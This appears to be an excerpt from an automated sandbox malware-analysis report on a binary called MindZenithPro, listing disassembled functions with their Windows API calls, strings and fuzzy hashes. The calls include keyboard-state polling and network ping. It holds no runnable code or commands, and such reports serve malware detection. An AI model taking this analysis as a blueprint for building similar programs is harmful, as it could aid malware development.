                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: 1fe75570f6e42d323c2aa2038c8025875614bd4c7ae7a56d39c34f8338a746df
                                    • Instruction ID: 54c0b1b189d277f703797b5ca110f0bad00b1873fef3719b7c287a5c593ed13a
                                    • Opcode Fuzzy Hash: 1fe75570f6e42d323c2aa2038c8025875614bd4c7ae7a56d39c34f8338a746df
                                    • Instruction Fuzzy Hash: 17316F31500215BBDF21AF64CC08FDB3B69EF4D716F110226FA15A61A2C735D855DB58
                                    Function 004443B7 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 004443E3
                                    • CoInitialize.OLE32(00000000), ref: 00444411
                                    • CoUninitialize.OLE32 ref: 0044441B
                                    • _wcslen.LIBCMT ref: 004444B4
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00444538
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0044465C
                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00444695
                                    • CoGetObject.OLE32(?,00000000,00460B80,?), ref: 004446B4
                                    • SetErrorMode.KERNEL32(00000000), ref: 004446C7
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0044474B
                                    • VariantClear.OLEAUT32(?), ref: 0044475F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                    • String ID:
                                    • API String ID: 429561992-0
                                    • Opcode ID: 45cb89d7222e363c06ddaf72e8e58c0255ae869c656798c616c515ac0529ddf9
                                    • Instruction ID: d7f4e438a8ebd0b56bf609d5f67b7074acad591c313b77dd601d6839da232eae
                                    • Opcode Fuzzy Hash: 45cb89d7222e363c06ddaf72e8e58c0255ae869c656798c616c515ac0529ddf9
                                    • Instruction Fuzzy Hash: 49C12371604301AFE700DF68C884A2BB7E9FF89748F14491EF99A9B211DB35ED06CB56
                                    Function 00438205 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 00438262
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004382FE
                                    • SHGetDesktopFolder.SHELL32(?), ref: 00438312
                                    • CoCreateInstance.OLE32(00460CF0,00000000,00000001,00487E7C,?), ref: 0043835E
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004383E3
                                    • CoTaskMemFree.OLE32(?,?), ref: 0043843B
                                    • SHBrowseForFolderW.SHELL32(?), ref: 004384C6
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004384E9
                                    • CoTaskMemFree.OLE32(00000000), ref: 004384F0
                                    • CoTaskMemFree.OLE32(00000000), ref: 00438545
                                    • CoUninitialize.OLE32 ref: 0043854B
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                    • String ID:
                                    • API String ID: 2762341140-0
                                    • Opcode ID: 356589f4eaa12745a1d815212f7d7d026735c2f9fc749a0440524ed8c1a30705
                                    • Instruction ID: 002c0a1acb06fccca5686f483af358217f8f4798a3ae9bce840c3f2fe79af5b9
                                    • Opcode Fuzzy Hash: 356589f4eaa12745a1d815212f7d7d026735c2f9fc749a0440524ed8c1a30705
                                    • Instruction Fuzzy Hash: F1C11975A00215AFDB14DFA4C884EAEBBB9EF48304F1480A9F815DB361DB35EE45CB94
                                    Function 00455BDD Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00455CC4
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00455CD5
                                    • CharNextW.USER32(00000158), ref: 00455D04
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00455D45
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00455D5B
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00455D6C
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$CharNext
                                    • String ID:
                                    • API String ID: 1350042424-0
                                    • Opcode ID: 60ea3ec05a3799f2fd1cb9a3306391c122a189b8681f50bb34c15d49d776463b
                                    • Instruction ID: 5c580a937f24c9c8b015e61af02d61a8fb438fd062c2bac7baac3ee607d0764e
                                    • Opcode Fuzzy Hash: 60ea3ec05a3799f2fd1cb9a3306391c122a189b8681f50bb34c15d49d776463b
                                    • Instruction Fuzzy Hash: 7E61AF31900619ABDF21DF90CC949FF3BB8EF09722F10411AFD25AB292C7789949DB59
                                    Function 0042010F Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00420136
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0042018F
                                    • VariantInit.OLEAUT32(?), ref: 004201A1
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004201C1
                                    • VariantCopy.OLEAUT32(?,?), ref: 00420214
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00420228
                                    • VariantClear.OLEAUT32(?), ref: 0042023D
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 0042024A
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00420253
                                    • VariantClear.OLEAUT32(?), ref: 00420265
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00420270
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 1f98908075ec8fa4d42229c44c9da6bbc96d66c7421e129229c5258a5cf0992a
                                    • Instruction ID: 6214cfb840b5d9487fc223caab1905acd03410babbaf2e3246ab35fddbabd3ed
                                    • Opcode Fuzzy Hash: 1f98908075ec8fa4d42229c44c9da6bbc96d66c7421e129229c5258a5cf0992a
                                    • Instruction Fuzzy Hash: 60415235E00219EFCF14DF64D8489AEBBB9EF48345F00806AE915A7262D734ED45CBA5
                                    Function 0042A36F Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 0042A397
                                    • GetAsyncKeyState.USER32(000000A0), ref: 0042A418
                                    • GetKeyState.USER32(000000A0), ref: 0042A433
                                    • GetAsyncKeyState.USER32(000000A1), ref: 0042A44D
                                    • GetKeyState.USER32(000000A1), ref: 0042A462
                                    • GetAsyncKeyState.USER32(00000011), ref: 0042A47A
                                    • GetKeyState.USER32(00000011), ref: 0042A48C
                                    • GetAsyncKeyState.USER32(00000012), ref: 0042A4A4
                                    • GetKeyState.USER32(00000012), ref: 0042A4B6
                                    • GetAsyncKeyState.USER32(0000005B), ref: 0042A4CE
                                    • GetKeyState.USER32(0000005B), ref: 0042A4E0
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 8e89a06ed17123a2c16e137eb26ba8749b3b0dc78fa7b0e4b854e4e745fb93aa
                                    • Instruction ID: 80e0c7dad5bcdf9d7da7e7d5ee0213a1295f51b9f46fc9ff31c5333fda2e43b4
                                    • Opcode Fuzzy Hash: 8e89a06ed17123a2c16e137eb26ba8749b3b0dc78fa7b0e4b854e4e745fb93aa
                                    • Instruction Fuzzy Hash: 5B41A7607047DA6BFB31A664A8087A7BEA16F11304F84805BDDC6463C2E7DCD9E4C76B
                                    Function 00440CE2 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WSOCK32(00000101,?), ref: 00440D43
                                    • inet_addr.WSOCK32(?), ref: 00440DA3
                                    • gethostbyname.WSOCK32(?), ref: 00440DAF
                                    • IcmpCreateFile.IPHLPAPI ref: 00440DBD
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00440E4D
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00440E6C
                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00440F40
                                    • WSACleanup.WSOCK32 ref: 00440F46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 980d94ea29adc540e132ecc12a856a59305b52dad76905d998ccfb062d14eb9b
                                    • Instruction ID: 1dda2dafbbb7f6ec6b020bfdc4b8cd7a2a3df260bb6db17866ab5469801a5b4c
                                    • Opcode Fuzzy Hash: 980d94ea29adc540e132ecc12a856a59305b52dad76905d998ccfb062d14eb9b
                                    • Instruction Fuzzy Hash: FF919F71504601AFE720DF15C484F16BBE0EF48318F1489AAF6698F7A2C778ED56CB86
                                    Function 0044945A Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharLower
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 707087890-567219261
                                    • Opcode ID: b2b2b81a33fb4465caed511d26de6358af9026dd731c084c386f52ac49be6a2f
                                    • Instruction ID: 8c0509687933b73259ff9d42545e06b8c83a28327314b82af1701b60a589254b
                                    • Opcode Fuzzy Hash: b2b2b81a33fb4465caed511d26de6358af9026dd731c084c386f52ac49be6a2f
                                    • Instruction Fuzzy Hash: 0A510732A00516ABDF15DF6CC9509BFB3A0AF24324B71462AF826EB380DB39DD41D794
                                    Function 00438904 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 004389C6
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004389D6
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004389E2
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00438A7F
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00438A93
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00438AC5
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00438AFB
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00438B04
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local$System
                                    • String ID: *.*
                                    • API String ID: 1464919966-438819550
                                    • Opcode ID: 12a4806c52d79108f36af15828e8c2f100a42eedc40e6287403a8301f61fb7f7
                                    • Instruction ID: 84918c50587eb715c8b6f1a6ee79a8faa293ee698c5ab14c83508d5129501d80
                                    • Opcode Fuzzy Hash: 12a4806c52d79108f36af15828e8c2f100a42eedc40e6287403a8301f61fb7f7
                                    • Instruction Fuzzy Hash: AF6136B25043559FCB10EF20C841AAAB3E8FF89314F04892EF999D7251EB35E945CB96
                                    Function 00433AF7 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00433B3E
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00433B5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: LoadString$_wcslen
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 4099089115-3080491070
                                    • Opcode ID: d465abcdb1c592ac9aca6e82e76b05ae0ad32e6aa5e4347fcdaae46a8263f238
                                    • Instruction ID: fa0b7f5266bfd5120d702af9365e81c826c5653240e50aed6bd72c59c6dcd158
                                    • Opcode Fuzzy Hash: d465abcdb1c592ac9aca6e82e76b05ae0ad32e6aa5e4347fcdaae46a8263f238
                                    • Instruction Fuzzy Hash: EA510532900509ABCF15EBE0DD42FEEB778AF14304F20446AB405B61A2DB386F58DB65
                                    Function 00435B02 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00435B0F
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00435B85
                                    • GetLastError.KERNEL32 ref: 00435B8F
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00435C16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: c7928f57860c908f7c330d49ca67f17f9848c1172b03a39d62b3f36809e8d2b5
                                    • Instruction ID: ef2ac4f3749fb841a64e6a54e64ee5fdc5cbe80086af4e1cf181ecba9906bfa7
                                    • Opcode Fuzzy Hash: c7928f57860c908f7c330d49ca67f17f9848c1172b03a39d62b3f36809e8d2b5
                                    • Instruction Fuzzy Hash: 21315E35A006059FDB11DF68C894AAAFBB4EF09304F2480AAE405DF392D779ED42CB95
                                    Function 00454404 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMenu.USER32 ref: 00454437
                                    • SetMenu.USER32(?,00000000), ref: 00454446
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004544CE
                                    • IsMenu.USER32(?), ref: 004544E2
                                    • CreatePopupMenu.USER32 ref: 004544EC
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00454519
                                    • DrawMenuBar.USER32 ref: 00454521
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                    • String ID: 0$F
                                    • API String ID: 161812096-3044882817
                                    • Opcode ID: e1bc877bd9320343fdd24e1704dbed4ab018c02bfba14730aa2ec0bd2c503639
                                    • Instruction ID: d2ce39679fe956ff75d41f88f08655534fc91d98fae863215da32ed9e5b78248
                                    • Opcode Fuzzy Hash: e1bc877bd9320343fdd24e1704dbed4ab018c02bfba14730aa2ec0bd2c503639
                                    • Instruction Fuzzy Hash: 224179B5A01309AFDF24CF64E844AAA7BB5FF89319F040029EE059B352D774E914CB58
                                    Function 0042CE59 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 81windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 0042CEF8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: L+IP+I$L+IP+I$blank$info$question$stop$warning
                                    • API String ID: 2457776203-1383793342
                                    • Opcode ID: e7ee9d042678246a0b6d1f1394cc7977e14bd2ffebd194afda0acdf4d2f53999
                                    • Instruction ID: 5c70eb73c99a81939573151020b7839490584626e707c9660fe52a72d363ca55
                                    • Opcode Fuzzy Hash: e7ee9d042678246a0b6d1f1394cc7977e14bd2ffebd194afda0acdf4d2f53999
                                    • Instruction Fuzzy Hash: 8311EE3274C726BAE7015A55BCC2D7F639C9F09360BB10027F500A62C2D7BCA940466D
                                    Function 004225C1 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 00424392: GetClassNameW.USER32(?,?,000000FF), ref: 004243B5
                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00422646
                                    • GetDlgCtrlID.USER32 ref: 00422651
                                    • GetParent.USER32 ref: 0042266D
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00422670
                                    • GetDlgCtrlID.USER32(?), ref: 00422679
                                    • GetParent.USER32(?), ref: 0042268D
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00422690
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 711023334-1403004172
                                    • Opcode ID: eeed094d6e31749df1394bf545fcdf47167e4cce4d5cb9f60e30c7df903c483a
                                    • Instruction ID: 89c9a0878b49e127c085af3a2196af01eb6a18e67a76ea87ddb6edbfb4dcb76c
                                    • Opcode Fuzzy Hash: eeed094d6e31749df1394bf545fcdf47167e4cce4d5cb9f60e30c7df903c483a
                                    • Instruction Fuzzy Hash: 9621FC71E00228BBCF11EFA0DC85EEEBBB4EF05314F10451AB95197291CB7D9806DB69
                                    Function 004226A2 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 00424392: GetClassNameW.USER32(?,?,000000FF), ref: 004243B5
                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00422725
                                    • GetDlgCtrlID.USER32 ref: 00422730
                                    • GetParent.USER32 ref: 0042274C
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0042274F
                                    • GetDlgCtrlID.USER32(?), ref: 00422758
                                    • GetParent.USER32(?), ref: 0042276C
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0042276F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 711023334-1403004172
                                    • Opcode ID: 792c3bcca9d58ea752479c10b9c2f0aeffccd9a6ec161aa61cfd28e7e4fd25f2
                                    • Instruction ID: 99371b052f1ce340bf38d0ccdb8cb18edac1747b556e93d8989176be554b0110
                                    • Opcode Fuzzy Hash: 792c3bcca9d58ea752479c10b9c2f0aeffccd9a6ec161aa61cfd28e7e4fd25f2
